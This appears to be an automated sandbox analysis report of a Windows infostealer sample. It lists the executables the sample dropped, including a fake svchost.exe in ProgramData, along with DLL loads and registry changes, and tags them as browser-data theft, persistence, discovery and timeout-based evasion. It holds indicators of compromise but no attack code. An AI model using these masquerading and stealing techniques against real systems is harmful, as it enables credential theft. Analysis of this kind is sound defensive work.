File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_en-GB.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_et.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_hi.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\~DF0B595319A2601E38.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\psuser.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_da.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_pl.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_te.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_id.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\GUTFD1F.tmp C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\psmachine_64.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_fi.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_hu.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_iw.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_pt-BR.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_sl.dll C:\ProgramData\setup\setup.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\setup\aa.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\setup\setup.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\133.0.6943.127_chrome_installer.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\setup\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\setup\aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Smart\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000745509500620e41d0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000745509500000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090074550950000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d74550950000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000007455095000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846529451297910" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services C:\ProgramData\NVIDIARV\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\Group = "Fatal" C:\ProgramData\NVIDIARV\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\InstallTime = "2025-02-21 23:08" C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\ C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\ C:\ProgramData\NVIDIARV\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\NumMethods\ = "6" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\VersionIndependentProgID\ = "GoogleUpdate.Update3WebMachine" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ChromeHTML\Application\AppUserModelId = "Chrome" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\NumMethods\ = "4" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreMachineClass.1\CLSID\ = "{9B2340A0-4068-43D6-B404-32E27217859D}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.312\\psmachine_64.dll" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9465B4B4-5216-4042-9A2C-754D3BCDC410}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ = "IProcessLauncher2" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D656199B-93F2-4D64-AA2F-96BD3F18D40E} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\ProgID\ = "GoogleUpdate.ProcessLauncher.1.0" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\ = "Google Update Legacy On Demand" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\LocalServer32 C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\INPROCSERVER32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\NumMethods\ = "4" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\APPID\{9465B4B4-5216-4042-9A2C-754D3BCDC410} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ = "IPolicyStatus3" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreMachineClass\ = "Google Update Core Class" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ChromeHTML\Application\ApplicationName = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
